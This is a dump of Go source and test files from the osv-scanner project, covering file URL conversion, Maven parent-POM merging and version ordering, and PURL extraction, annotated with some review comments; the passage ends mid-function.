// volume name starts with `\\` (a UNC path) puts the host part into URL.Host
// and the rest into URL.Path; any other volume name is kept inside the path
// behind a leading "/". A path without a volume name is used as the URL path
// after filepath.ToSlash.
//
// The path is not cleaned here, so "." and ".." segments are carried into the
// URL as given, and the UNC host is copied into URL.Host verbatim.
// NOTE(review): callers that compare or confine the resulting URLs should
// normalise the path first - confirm against the call sites.
func FromFilePath(path string) (*url.URL, error) {
	if !filepath.IsAbs(path) {
		return nil, errNotAbsolute
	}

	// If path has a Windows volume name, convert the volume to a host and prefix
	// per https://blogs.msdn.microsoft.com/ie/2006/12/06/file-uris-in-windows/.
	if vol := filepath.VolumeName(path); vol != "" {
		if strings.HasPrefix(vol, `\\`) {
			// Drop the two leading backslashes; what follows is host[/share/...].
			path = filepath.ToSlash(path[2:])
			i := strings.IndexByte(path, '/')

			if i < 0 {
				// A degenerate case.
				// \\host.example.com (without a share name)
				// becomes
				// file://host.example.com/
				return &url.URL{
					Scheme: "file",
					Host:   path,
					Path:   "/",
				}, nil
			}

			// \\host.example.com\Share\path\to\file
			// becomes
			// file://host.example.com/Share/path/to/file
			return &url.URL{
				Scheme: "file",
				Host:   path[:i],
				Path:   filepath.ToSlash(path[i:]),
			}, nil
		}

		// C:\path\to\file
		// becomes
		// file:///C:/path/to/file
		return &url.URL{
			Scheme: "file",
			Path:   "/" + filepath.ToSlash(path),
		}, nil
	}

	// /path/to/file
	// becomes
	// file:///path/to/file
	return &url.URL{
		Scheme: "file",
		Path:   filepath.ToSlash(path),
	}, nil
}

================================================
FILE: internal/url/url_other_test.go
================================================
// Copyright 2019 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
//go:build !windows

package url

// Code copied from https://github.com/golang/go/blob/7c2b69080a0b9e35174cc9c93497b6e7176f8275/src/cmd/go/internal/web/url_other_test.go

// urlTests is the non-Windows table of URL / file path pairs.
// TestURLFromFilePath skips every entry whose filePath is empty, so the
// wantErr-only entry (the non-local host) is not exercised by it.
var urlTests = []struct {
	url          string
	filePath     string
	canonicalURL string // If empty, assume equal to url.
	wantErr      string
}{
	// Examples from RFC 8089:
	{
		url:      `file:///path/to/file`,
		filePath: `/path/to/file`,
	},
	{
		url:          `file:/path/to/file`,
		filePath:     `/path/to/file`,
		canonicalURL: `file:///path/to/file`,
	},
	{
		url:          `file://localhost/path/to/file`,
		filePath:     `/path/to/file`,
		canonicalURL: `file:///path/to/file`,
	},

	// We reject non-local files.
	{
		url:     `file://host.example.com/path/to/file`,
		wantErr: "file URL specifies non-local host",
	},
}

================================================
FILE: internal/url/url_test.go
================================================
// Copyright 2019 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package url

import (
	"testing"
)

// Code copied from https://github.com/golang/go/blob/7c2b69080a0b9e35174cc9c93497b6e7176f8275/src/cmd/go/internal/web/url_test.go

// TestURLFromFilePath runs FromFilePath over every urlTests entry that has a
// filePath and compares the result with canonicalURL, or with url when
// canonicalURL is empty. Entries without a filePath are skipped.
func TestURLFromFilePath(t *testing.T) {
	t.Parallel()

	for _, tc := range urlTests {
		if tc.filePath == "" {
			continue
		}

		t.Run(tc.filePath, func(t *testing.T) {
			t.Parallel()

			u, err := FromFilePath(tc.filePath)
			if err != nil {
				// An error counts as a pass only when its text equals wantErr.
				if err.Error() == tc.wantErr {
					return
				}
				if tc.wantErr == "" {
					t.Fatalf("urlFromFilePath(%v): %v; want ", tc.filePath, err)
				} else {
					t.Fatalf("urlFromFilePath(%v): %v; want %s", tc.filePath, err, tc.wantErr)
				}
			}

			if tc.wantErr != "" {
				t.Fatalf("urlFromFilePath(%v) = ; want error: %s", tc.filePath, tc.wantErr)
			}

			wantURL := tc.url
			if tc.canonicalURL != "" {
				wantURL = tc.canonicalURL
			}
			if u.String() != wantURL {
				t.Errorf("urlFromFilePath(%v) = %v; want %s", tc.filePath, u, wantURL)
			}
		})
	}
}

================================================
FILE: internal/url/url_windows_test.go
================================================
// Copyright 2019 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

package url

// Code copied from https://github.com/golang/go/blob/7c2b69080a0b9e35174cc9c93497b6e7176f8275/src/cmd/go/internal/web/url_windows_test.go

// urlTests is the Windows table of URL / file path pairs. Entries that set
// only url and wantErr have no filePath, so TestURLFromFilePath skips them.
var urlTests = []struct {
	url          string
	filePath     string
	canonicalURL string // If empty, assume equal to url.
	wantErr      string
}{
	// Examples from https://blogs.msdn.microsoft.com/ie/2006/12/06/file-uris-in-windows/:

	{
		url:      `file://laptop/My%20Documents/FileSchemeURIs.doc`,
		filePath: `\\laptop\My Documents\FileSchemeURIs.doc`,
	},
	{
		url:      `file:///C:/Documents%20and%20Settings/davris/FileSchemeURIs.doc`,
		filePath: `C:\Documents and Settings\davris\FileSchemeURIs.doc`,
	},
	{
		url:      `file:///D:/Program%20Files/Viewer/startup.htm`,
		filePath: `D:\Program Files\Viewer\startup.htm`,
	},
	{
		url:          `file:///C:/Program%20Files/Music/Web%20Sys/main.html?REQUEST=RADIO`,
		filePath:     `C:\Program Files\Music\Web Sys\main.html`,
		canonicalURL: `file:///C:/Program%20Files/Music/Web%20Sys/main.html`,
	},
	{
		url:      `file://applib/products/a-b/abc_9/4148.920a/media/start.swf`,
		filePath: `\\applib\products\a-b\abc_9\4148.920a\media\start.swf`,
	},
	{
		url:     `file:////applib/products/a%2Db/abc%5F9/4148.920a/media/start.swf`,
		wantErr: "file URL missing drive letter",
	},
	{
		url:     `C:\Program Files\Music\Web Sys\main.html?REQUEST=RADIO`,
		wantErr: "non-file URL",
	},

	// The example "file://D:\Program Files\Viewer\startup.htm" errors out in
	// url.Parse, so we substitute a slash-based path for testing instead.
	{
		url:     `file://D:/Program Files/Viewer/startup.htm`,
		wantErr: "file URL encodes volume in host field: too few slashes?",
	},

	// The blog post discourages the use of non-ASCII characters because they
	// depend on the user's current codepage. However, when we are working with Go
	// strings we assume UTF-8 encoding, and our url package refuses to encode
	// URLs to non-ASCII strings.
	{
		url:          `file:///C:/exampleㄓ.txt`,
		filePath:     `C:\exampleㄓ.txt`,
		canonicalURL: `file:///C:/example%E3%84%93.txt`,
	},
	{
		url:      `file:///C:/example%E3%84%93.txt`,
		filePath: `C:\exampleㄓ.txt`,
	},

	// Examples from RFC 8089:

	// We allow the drive-letter variation from section E.2, because it is
	// simpler to support than not to. However, we do not generate the shorter
	// form in the reverse direction.
	{
		url:          `file:c:/path/to/file`,
		filePath:     `c:\path\to\file`,
		canonicalURL: `file:///c:/path/to/file`,
	},

	// We encode the UNC share name as the authority following section E.3.1,
	// because that is what the Microsoft blog post explicitly recommends.
	{
		url:      `file://host.example.com/Share/path/to/file.txt`,
		filePath: `\\host.example.com\Share\path\to\file.txt`,
	},

	// We decline the four- and five-slash variations from section E.3.2.
	// The paths in these URLs would change meaning under path.Clean.
	{
		url:     `file:////host.example.com/path/to/file`,
		wantErr: "file URL missing drive letter",
	},
	{
		url:     `file://///host.example.com/path/to/file`,
		wantErr: "file URL missing drive letter",
	},
}

================================================
FILE: internal/utility/depgroup/devgroup.go
================================================
// Package depgroups provides functionality for working with dependency groups.
package depgroups

import (
	"slices"

	"github.com/ossf/osv-schema/bindings/go/osvconstants"
)

// IsDevGroup returns if any string in groups indicates the development dependency group for the specified ecosystem.
//
// The group name that counts as "development" is "dev" for Packagist, npm,
// PyPI and Pub, "build-requires" for ConanCenter and "test" for Maven. The
// match is an exact string comparison. Every other ecosystem returns false.
func IsDevGroup(sys osvconstants.Ecosystem, groups []string) bool {
	var dev string
	switch sys {
	case osvconstants.EcosystemPackagist, osvconstants.EcosystemNPM, osvconstants.EcosystemPyPI, osvconstants.EcosystemPub:
		dev = "dev"
	case osvconstants.EcosystemConanCenter:
		dev = "build-requires"
	case osvconstants.EcosystemMaven:
		dev = "test"
	default:
		// We are not able to report development dependencies for these ecosystems.
		return false
	}

	return slices.Contains(groups, dev)
}

================================================
FILE: internal/utility/maven/maven.go
================================================
// Package maven provides utility functions for working with Maven projects.
package maven

import (
	"context"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"

	"deps.dev/util/maven"
	"deps.dev/util/resolve"
	"deps.dev/util/semver"
	"github.com/google/osv-scanner/v2/internal/datasource"
)

// Origin labels.
// NOTE(review): presumably these tag where a dependency entry was declared;
// none of them is used in the code visible here.
const (
	OriginManagement = "management"
	OriginParent     = "parent"
	OriginPlugin     = "plugin"
	OriginProfile    = "profile"
)

// MaxParent sets a limit on the number of parents to avoid indefinite loop.
const MaxParent = 100

// MergeParents parses local accessible parent pom.xml or fetches it from
// upstream, merges into root project, then interpolate the properties.
// result holds the merged Maven project.
// current holds the current parent project to merge.
// start indicates the index of the current parent project, which is used to
// check if the packaging has to be `pom`.
// allowLocal indicates whether parsing local parent pom.xml is allowed.
// path holds the path to the current pom.xml, which is used to compute the
// relative path of parent.
//
// The walk stops at the first parent with an empty groupId, artifactId or
// version, returns an error when a parent key repeats, and ends silently
// (no error) once the index reaches MaxParent.
//
// Trust notes for scanning projects that are not trusted:
//   - With allowLocal set, the parent location is built from the relativePath
//     written in the POM and the file is opened with os.Open. No check that
//     the resolved path stays inside a particular directory is visible in
//     this function. NOTE(review): confirm callers enable allowLocal only for
//     trees they are willing to read from.
//   - Every repository declared by a merged parent is registered on
//     mavenClient, and no scheme or host restriction on repo.URL is visible
//     here. NOTE(review): confirm AddRegistry validates the URL, since later
//     fetches presumably go to the registered registries.
func MergeParents(ctx context.Context, mavenClient *datasource.MavenRegistryAPIClient, result *maven.Project, current maven.Parent, start int, path string, allowLocal bool) error {
	currentPath := path
	visited := make(map[maven.ProjectKey]bool, MaxParent)
	for n := start; n < MaxParent; n++ {
		if current.GroupID == "" || current.ArtifactID == "" || current.Version == "" {
			break
		}
		if visited[current.ProjectKey] {
			// A cycle of parents is detected
			return errors.New("a cycle of parents is detected")
		}
		visited[current.ProjectKey] = true

		var proj maven.Project
		parentFound := false
		if allowLocal {
			if parentPath := ParentPOMPath(currentPath, string(current.RelativePath)); parentPath != "" {
				// currentPath advances even when the file is rejected below.
				currentPath = parentPath
				f, err := os.Open(parentPath)
				if err != nil {
					return fmt.Errorf("failed to open parent file %s: %w", parentPath, err)
				}
				err = datasource.NewMavenDecoder(f).Decode(&proj)
				f.Close()
				if err != nil {
					return fmt.Errorf("failed to unmarshal project: %w", err)
				}
				if ProjectKey(proj) == current.ProjectKey && proj.Packaging == "pom" {
					// Only mark the parent as found when the identifiers and packaging are as expected.
					parentFound = true
				}
			}
		}
		if !parentFound {
			// Once we fetch a parent pom.xml from upstream, we should not
			// allow parsing parent pom.xml locally anymore.
			allowLocal = false

			var err error
			if proj, err = mavenClient.GetProject(ctx, string(current.GroupID), string(current.ArtifactID), string(current.Version)); err != nil {
				return fmt.Errorf("failed to get Maven project %s:%s:%s: %w", current.GroupID, current.ArtifactID, current.Version, err)
			}
			if n > 0 && proj.Packaging != "pom" {
				// A parent project should only be of "pom" packaging type.
				return fmt.Errorf("invalid packaging for parent project %s", proj.Packaging)
			}
			if ProjectKey(proj) != current.ProjectKey {
				// The identifiers in parent does not match what we want.
				return fmt.Errorf("parent identifiers mismatch: %v, expect %v", proj.ProjectKey, current.ProjectKey)
			}
		}
		// Empty JDK and ActivationOS indicates merging the default profiles.
		// Note the receiver is result, not the parent that was just loaded.
		if err := result.MergeProfiles("", maven.ActivationOS{}); err != nil {
			return fmt.Errorf("failed to merge profiles: %w", err)
		}
		// Repository entries come from the parent POM content.
		for _, repo := range proj.Repositories {
			if err := mavenClient.AddRegistry(datasource.MavenRegistry{
				URL:              string(repo.URL),
				ID:               string(repo.ID),
				ReleasesEnabled:  repo.Releases.Enabled.Boolean(),
				SnapshotsEnabled: repo.Snapshots.Enabled.Boolean(),
			}); err != nil {
				return fmt.Errorf("failed to add registry %s: %w", repo.URL, err)
			}
		}
		result.MergeParent(proj)
		current = proj.Parent
	}
	// Interpolate the project to resolve the properties.
	return result.Interpolate()
}

// ProjectKey returns a project key with empty groupId/version
// filled by corresponding fields in parent.
// proj is passed by value, so the caller's project is not modified.
func ProjectKey(proj maven.Project) maven.ProjectKey {
	if proj.GroupID == "" {
		proj.GroupID = proj.Parent.GroupID
	}
	if proj.Version == "" {
		proj.Version = proj.Parent.Version
	}

	return proj.ProjectKey
}

// ParentPOMPath resolves the path to the parent POM in the same manner as Maven.
//
// That is, it first looks for the parent POM in the 'relativePath' directory,
// then in the parent directory, and finally in the remote repository.
//
// Only the local part happens in this function: it returns the path of an
// existing local file, or "" when there is none, and the remote lookup is
// left to the caller. An empty relativePath defaults to "../pom.xml".
//
// relativePath is used as given: it is joined onto the directory of
// currentPath, and no check that the result stays under a particular root is
// made here.
// NOTE(review): when the POM comes from a project that is not trusted, the
// returned path may point outside the scanned tree - confirm that callers
// accept this.
func ParentPOMPath(currentPath, relativePath string) string {
	if relativePath == "" {
		relativePath = "../pom.xml"
	}

	path := filepath.Join(filepath.Dir(currentPath), relativePath)
	if info, err := os.Stat(path); err == nil {
		if !info.IsDir() {
			return path
		}
		// Current path is a directory, so look for pom.xml in the directory.
		path = filepath.Join(path, "pom.xml")
		if _, err := os.Stat(path); err == nil {
			return path
		}
	}

	return ""
}

// GetDependencyManagement returns managed dependencies in the specified Maven project by fetching remote pom.xml.
//
// Parents are merged with local parsing disabled (allowLocal is false and the
// path is empty) and on the client returned by client.WithoutRegistries().
// NOTE(review): presumably that client does not carry the registries added so
// far, so registrations made during this merge stay off the caller's client;
// confirm against WithoutRegistries.
func GetDependencyManagement(ctx context.Context, client *datasource.MavenRegistryAPIClient, groupID, artifactID, version maven.String) (maven.DependencyManagement, error) {
	root := maven.Parent{ProjectKey: maven.ProjectKey{GroupID: groupID, ArtifactID: artifactID, Version: version}}
	var result maven.Project
	// To get dependency management from another project, we need the
	// project with parents merged, so we call MergeParents by passing
	// an empty project.
	if err := MergeParents(ctx, client.WithoutRegistries(), &result, root, 0, "", false); err != nil {
		return maven.DependencyManagement{}, err
	}

	return result.DependencyManagement, nil
}

// CompareVersions compares two Maven semver versions with special behaviour for specific packages,
// producing more desirable ordering using non-standard comparison.
//
// A nil a sorts before any b; a nil b sorts before a non-nil a.
// NOTE(review): when both are nil the result is -1 rather than 0, so the
// function is not a consistent comparator for that input - confirm no caller
// sorts with two nil versions.
func CompareVersions(vk resolve.VersionKey, a *semver.Version, b *semver.Version) int {
	if a == nil || b == nil {
		if a == nil {
			return -1
		}

		return 1
	}

	if vk.Name == "com.google.guava:guava" {
		// com.google.guava:guava has 'flavors' with versions ending with -jre or -android.
		// https://github.com/google/guava/wiki/ReleasePolicy#flavors
		// To preserve the flavor in updates, we make the opposite flavor considered the earliest versions.

		// Old versions have '22.0' and '22.0-android', and even older version don't have any flavors.
		// Only check for the android flavor, and assume its jre otherwise.
		wantAndroid := strings.HasSuffix(vk.Version, "-android")

		aIsAndroid := strings.HasSuffix(a.String(), "-android")
		bIsAndroid := strings.HasSuffix(b.String(), "-android")

		if aIsAndroid == bIsAndroid {
			return a.Compare(b)
		}

		// The flavors differ: the one matching vk's flavor sorts later.
		if aIsAndroid == wantAndroid {
			return 1
		}

		return -1
	}

	// Old versions of apache commons-* libraries (commons-io:commons-io, commons-math:commons-math, etc.)
	// used date-based versions (e.g. 20040118.003354), which naturally sort after the more recent semver versions.
	// We manually force the date versions to come before the others to prevent downgrades.
	if strings.HasPrefix(vk.Name, "commons-") {
		// All date-based versions of these packages seem to be in the years 2002-2005.
		// It's extremely unlikely we'd see any versions dated before 1999 or after 2010.
		// It's also unlikely we'd see any major versions of these packages reach up to 200.0.0.
		// Checking if the version starts with "200" should therefore be sufficient to determine if it's a year.
		aCal := strings.HasPrefix(a.String(), "200")
		bCal := strings.HasPrefix(b.String(), "200")

		if aCal == bCal {
			return a.Compare(b)
		}

		if aCal {
			return -1
		}

		return 1
	}

	return a.Compare(b)
}

================================================
FILE: internal/utility/maven/maven_test.go
================================================
package maven_test

import (
	"path/filepath"
	"testing"

	"deps.dev/util/resolve"
	"deps.dev/util/semver"
	"github.com/google/osv-scanner/v2/internal/utility/maven"
)

func TestParentPOMPath(t *testing.T) {
	t.Parallel()

	tests := []struct {
		currentPath, relativePath string
		want                      string
	}{
		// testdata
		// |- maven
		// | |- my-app
		// | | |- pom.xml
		// | |- parent
		// | | |- pom.xml
		// |- pom.xml
		{
			// Parent path is specified correctly.
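currentPath: filepath.Join("testdata", "my-app", "pom.xml"),
			relativePath: "../parent/pom.xml",
			want:         filepath.Join("testdata", "parent", "pom.xml"),
		},
		{
			// Wrong file name is specified in relative path.
			currentPath:  filepath.Join("testdata", "my-app", "pom.xml"),
			relativePath: "../parent/abc.xml",
			want:         "",
		},
		{
			// Wrong directory is specified in relative path.
			currentPath:  filepath.Join("testdata", "my-app", "pom.xml"),
			relativePath: "../not-found/pom.xml",
			want:         "",
		},
		{
			// Only directory is specified.
			currentPath:  filepath.Join("testdata", "my-app", "pom.xml"),
			relativePath: "../parent",
			want:         filepath.Join("testdata", "parent", "pom.xml"),
		},
		{
			// Parent relative path is default to '../pom.xml'.
			currentPath:  filepath.Join("testdata", "my-app", "pom.xml"),
			relativePath: "",
			want:         filepath.Join("testdata", "pom.xml"),
		},
		{
			// No pom.xml is found even in the default path.
			currentPath:  filepath.Join("testdata", "pom.xml"),
			relativePath: "",
			want:         "",
		},
	}
	for _, tt := range tests {
		got := maven.ParentPOMPath(tt.currentPath, tt.relativePath)
		if got != tt.want {
			t.Errorf("ParentPOMPath(%s, %s): got %s, want %s", tt.currentPath, tt.relativePath, got, tt.want)
		}
	}
}

func TestCompareVersions(t *testing.T) {
	t.Parallel()

	versionKey := func(name string, version string) resolve.VersionKey {
		return resolve.VersionKey{
			PackageKey: resolve.PackageKey{
				System: resolve.Maven,
				Name:   name,
			},
			Version: version,
		}
	}

	semVer := func(version string) *semver.Version {
		parsed, _ := resolve.Maven.Semver().Parse(version)
		return parsed
	}

	tests := []struct {
		vk   resolve.VersionKey
		a, b *semver.Version
		want int
	}{
		{
			versionKey("abc:xyz", "1.0.0"),
			semVer("1.2.3"),
			semVer("1.2.3"),
			0,
		},
		{
			versionKey("abc:xyz", "1.0.0"),
			semVer("1.2.3"),
			semVer("2.3.4"),
			-1,
		},
		{
			versionKey("com.google.guava:guava", "1.0.0"),
			semVer("1.2.3"),
			semVer("2.3.4"),
			-1,
		},
		{
			versionKey("com.google.guava:guava", "1.0.0"),
			semVer("1.2.3-jre"),
			semVer("2.3.4-jre"),
			-1,
		},
		{
			versionKey("com.google.guava:guava", "1.0.0"),
			semVer("1.2.3-android"),
			semVer("2.3.4-android"),
			-1,
		},
		{
			versionKey("com.google.guava:guava", "1.0.0"),
			semVer("2.3.4-android"),
			semVer("1.2.3-jre"),
			-1,
		},
		{
			versionKey("com.google.guava:guava", "1.0.0-jre"),
			semVer("1.2.3-android"),
			semVer("1.2.3-jre"),
			-1,
		},
		{
			versionKey("com.google.guava:guava", "1.0.0-android"),
			semVer("1.2.3-android"),
			semVer("1.2.3-jre"),
			1,
		},
		{
			versionKey("commons-io:commons-io", "1.0.0"),
			semVer("1.2.3"),
			semVer("2.3.4"),
			-1,
		},
		{
			versionKey("commons-io:commons-io", "1.0.0"),
			semVer("1.2.3"),
			semVer("20010101.000000"),
			1,
		},
	}
	for _, tt := range tests {
		got := maven.CompareVersions(tt.vk, tt.a, tt.b)
		if got != tt.want {
			// got and want are ints; %d prints them as decimal numbers.
			t.Errorf("CompareVersions(%v, %v, %v): got %d, want %d", tt.vk, tt.a, tt.b, got, tt.want)
		}
	}
}

================================================
FILE: internal/utility/maven/testdata/my-app/pom.xml
================================================
org.test my-app 1.0.0

================================================
FILE: internal/utility/maven/testdata/parent/pom.xml
================================================
org.test parent-pom 1.0.0

================================================
FILE: internal/utility/maven/testdata/pom.xml
================================================
org.test test 1.0.0

================================================
FILE: internal/utility/purl/composer.go
================================================
package purl

import (
	"fmt"
	"strings"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// FromComposer splits a Packagist package name of the form "vendor/package"
// into the PURL namespace (vendor) and name (package).
//
// An error is returned unless the name consists of exactly two non-empty
// parts. Package names come from scanned manifests, so a name such as
// "vendor/" is rejected rather than turned into a PURL with an empty name.
func FromComposer(packageInfo models.PackageInfo) (namespace string, name string, err error) {
	nameParts := strings.Split(packageInfo.Name, "/")
	if len(nameParts) != 2 || nameParts[0] == "" || nameParts[1] == "" {
		return "", "", fmt.Errorf("invalid packagist package_name (%s)", packageInfo.Name)
	}

	return nameParts[0], nameParts[1], nil
}

================================================
FILE: internal/utility/purl/composer_test.go
================================================
package purl_test

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/utility/purl"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
)

func TestComposerExtraction_shouldExtractPackages(t *testing.T) {
	t.Parallel()
	testCase := struct {
		packageInfo       models.PackageInfo
		expectedNamespace string
		expectedName      string
	}{
		packageInfo: models.PackageInfo{
			Name:      "symfony/yaml",
			Version:   "7.0.0",
			Ecosystem: string(osvconstants.EcosystemPackagist),
			Commit:    "",
		},
		expectedNamespace: "symfony",
		expectedName:      "yaml",
	}

	namespace, name, err := purl.FromComposer(testCase.packageInfo)
	if err != nil {
		t.Errorf("Extraction didn't succeed, package has been wrongfully filtered")
	}
	if namespace != testCase.expectedNamespace {
		t.Errorf("got %s; want %s", namespace, testCase.expectedNamespace)
	}
	if name != testCase.expectedName {
		t.Errorf("got %s; want %s", name, testCase.expectedName)
	}
}

func TestComposerExtraction_shouldFilterPackages(t *testing.T) {
	t.Parallel()
	testCases := []struct {
		name        string
		packageInfo models.PackageInfo
	}{
		{
			name: "when_package_contains_less_than_2_parts",
			packageInfo: models.PackageInfo{
				Name:      "symfony",
				Version:   "7.0.0",
				Ecosystem: string(osvconstants.EcosystemPackagist),
				Commit:    "",
			},
		},
		{
			name: "when_package_have_no_name",
			packageInfo: models.PackageInfo{
				Name:      "",
				Version:   "7.0.0",
				Ecosystem: string(osvconstants.EcosystemPackagist),
				Commit:    "",
			},
		},
		{
			// Constructed input: two parts, but the package half is empty.
			name: "when_package_has_an_empty_part",
			packageInfo: models.PackageInfo{
				Name:      "symfony/",
				Version:   "7.0.0",
				Ecosystem: string(osvconstants.EcosystemPackagist),
				Commit:    "",
			},
		},
	}

	for _, test := range testCases {
		testCase := test
		t.Run(testCase.name, func(t *testing.T) {
			t.Parallel()
			_, _, err := purl.FromComposer(testCase.packageInfo)
			if err == nil {
				t.Errorf("Package %v should have been filtered\n", testCase.packageInfo)
			}
		})
	}
}

================================================
FILE: internal/utility/purl/golang.go
================================================
package purl

import (
	"fmt"
	"strings"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// FromGo splits a Go package path into the PURL namespace (everything before
// the last "/") and name (the last path segment). A path without "/" yields
// an empty namespace.
//
// An error is returned when the last segment is empty, which covers both an
// empty name and a path with a trailing "/"; either would otherwise produce a
// PURL with no name.
func FromGo(packageInfo models.PackageInfo) (namespace string, name string, err error) {
	// strings.Split with a non-empty separator always returns at least one
	// element, so indexing the last one is safe.
	nameParts := strings.Split(packageInfo.Name, "/")
	last := len(nameParts) - 1
	if nameParts[last] == "" {
		return "", "", fmt.Errorf("invalid golang package_name (%s)", packageInfo.Name)
	}

	return strings.Join(nameParts[:last], "/"), nameParts[last], nil
}

================================================
FILE: internal/utility/purl/golang_test.go
================================================
package purl_test

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/utility/purl"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
)

func TestGolangExtraction_shouldExtractPackages(t *testing.T) {
	t.Parallel()
	testCases := []struct {
		name              string
		packageInfo       models.PackageInfo
		expectedNamespace string
		expectedName      string
	}{
		{
			name: "when_package_comes_from_go_registry",
			packageInfo: models.PackageInfo{
				Name:      "golang.org/x/mod",
				Version:   "v0.14.0",
				Ecosystem: string(osvconstants.EcosystemGo),
				Commit:    "",
			},
			expectedNamespace: "golang.org/x",
			expectedName:      "mod",
		},
		{
			name: "when_package_comes_from_github",
			packageInfo: models.PackageInfo{
				Name:      "github.com/urfave/cli/v2",
				Version:   "v2.26.0",
				Ecosystem: string(osvconstants.EcosystemGo),
				Commit:    "",
			},
			expectedNamespace: "github.com/urfave/cli",
			expectedName:      "v2",
		},
		{
			name: "when_package_uses_a_domain",
			packageInfo: models.PackageInfo{
				Name:      "go.opencensus.io",
				Version:   "v0.24.0",
				Ecosystem: string(osvconstants.EcosystemGo),
				Commit:    "",
			},
			expectedNamespace: "",
			expectedName:      "go.opencensus.io",
		},
	}

	for _, test := range testCases {
		testCase := test
		t.Run(testCase.name, func(t *testing.T) {
			t.Parallel()
			namespace, name, err := purl.FromGo(testCase.packageInfo)
			if err != nil {
				t.Errorf("Extraction didn't succeed, package has been wrongfully filtered")
			}
			if namespace != testCase.expectedNamespace {
				t.Errorf("got %s; want %s", namespace, testCase.expectedNamespace)
			}
			if name != testCase.expectedName {
				t.Errorf("got %s; want %s", name, testCase.expectedName)
			}
		})
	}
}

func TestGolangExtraction_shouldFilterPackages(t *testing.T) {
	t.Parallel()
	testCases := []struct {
		name        string
		packageInfo models.PackageInfo
	}{
		{
			name: "when_package_have_no_name",
			packageInfo: models.PackageInfo{
				Name:      "",
				Version:   "v2.26.0",
				Ecosystem: string(osvconstants.EcosystemGo),
				Commit:    "",
			},
		},
		{
			// Constructed input: the path ends with a separator.
			name: "when_package_ends_with_a_slash",
			packageInfo: models.PackageInfo{
				Name:      "github.com/urfave/",
				Version:   "v2.26.0",
				Ecosystem: string(osvconstants.EcosystemGo),
				Commit:    "",
			},
		},
	}

	for _, test := range testCases {
		testCase := test
		t.Run(testCase.name, func(t *testing.T) {
			t.Parallel()
			_, _, err := purl.FromGo(testCase.packageInfo)
			if err == nil {
				t.Errorf("Package %v should have been filtered\n", testCase.packageInfo)
			}
		})
	}
}

================================================
FILE: internal/utility/purl/maven.go
================================================
package purl

import (
	"fmt"
	"strings"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// FromMaven splits a Maven package name of the form "groupId:artifactId" into
// the PURL namespace (groupId) and name (artifactId).
//
// An error is returned unless the name consists of exactly two non-empty
// parts, so a name such as "group:" never becomes a PURL with an empty name.
func FromMaven(packageInfo models.PackageInfo) (namespace string, name string, err error) {
	nameParts := strings.Split(packageInfo.Name, ":")
	if len(nameParts) != 2 || nameParts[0] == "" || nameParts[1] == "" {
		return "", "", fmt.Errorf("invalid maven package_name(%s)", packageInfo.Name)
	}

	return nameParts[0], nameParts[1], nil
}

================================================
FILE: internal/utility/purl/maven_test.go
================================================
package purl_test

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/utility/purl"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
)

func TestMavenExtraction_shouldExtractPackages(t *testing.T) {
	t.Parallel()
	testCase := struct {
		packageInfo       models.PackageInfo
		expectedNamespace string
		expectedName      string
	}{
		packageInfo: models.PackageInfo{
			Name:      "log4j:log4j-core",
			Version:   "1.2.17",
			Ecosystem: string(osvconstants.EcosystemMaven),
			Commit:    "",
		},
		expectedNamespace: "log4j",
		expectedName:      "log4j-core",
	}

	namespace, name, err := purl.FromMaven(testCase.packageInfo)
	if err != nil {
		t.Errorf("Extraction didn't succeed, package has been wrongfully filtered")
	}
	if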
namespace != testCase.expectedNamespace {
		t.Errorf("got %s; want %s", namespace, testCase.expectedNamespace)
	}
	if name != testCase.expectedName {
		t.Errorf("got %s; want %s", name, testCase.expectedName)
	}
}

func TestMavenExtraction_shouldFilterPackages(t *testing.T) {
	t.Parallel()
	testCases := []struct {
		name        string
		packageInfo models.PackageInfo
	}{
		{
			name: "when_package_contains_less_than_2_parts",
			packageInfo: models.PackageInfo{
				Name:      "log4j",
				Version:   "1.2.17",
				Ecosystem: string(osvconstants.EcosystemMaven),
				Commit:    "",
			},
		},
		{
			name: "when_package_have_no_name",
			packageInfo: models.PackageInfo{
				Name:      "",
				Version:   "1.2.17",
				Ecosystem: string(osvconstants.EcosystemMaven),
				Commit:    "",
			},
		},
	}

	for _, test := range testCases {
		testCase := test
		t.Run(testCase.name, func(t *testing.T) {
			t.Parallel()
			_, _, err := purl.FromMaven(testCase.packageInfo)
			if err == nil {
				t.Errorf("Package %v should have been filtered\n", testCase.packageInfo)
			}
		})
	}
}

================================================
FILE: internal/utility/purl/package_grouper.go
================================================
package purl

import (
	"slices"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// Group takes a list of package sources and groups their packages in a map
// keyed by PURL, so each package appears once even when it was detected
// several times.
//
// A package whose PURL cannot be built is skipped and its error collected;
// the other packages are still grouped. Both the grouped packages and every
// collected error are returned.
//
// When a PURL is seen again, only DepGroups is merged into the existing
// entry. NOTE(review): vulnerabilities, groups and licenses of later
// occurrences are not merged, which presumably relies on every occurrence of
// one PURL carrying the same findings; verify against the callers.
func Group(packageSources []models.PackageSource) (map[string]models.PackageVulns, []error) {
	grouped := make(map[string]models.PackageVulns)
	errs := make([]error, 0)

	for _, source := range packageSources {
		for _, pkg := range source.Packages {
			packageURL, err := FromPackage(pkg.Package)
			if err != nil {
				errs = append(errs, err)
				continue
			}
			key := packageURL.ToString()

			if existing, seen := grouped[key]; seen {
				// Already grouped: extend the dependency groups, which may
				// differ between occurrences.
				existing.DepGroups = append(existing.DepGroups, pkg.DepGroups...)
				grouped[key] = existing

				continue
			}

			// First occurrence: store a copy whose slices do not alias the input.
			grouped[key] = models.PackageVulns{
				Package: models.PackageInfo{
					Name:       pkg.Package.Name,
					Version:    pkg.Package.Version,
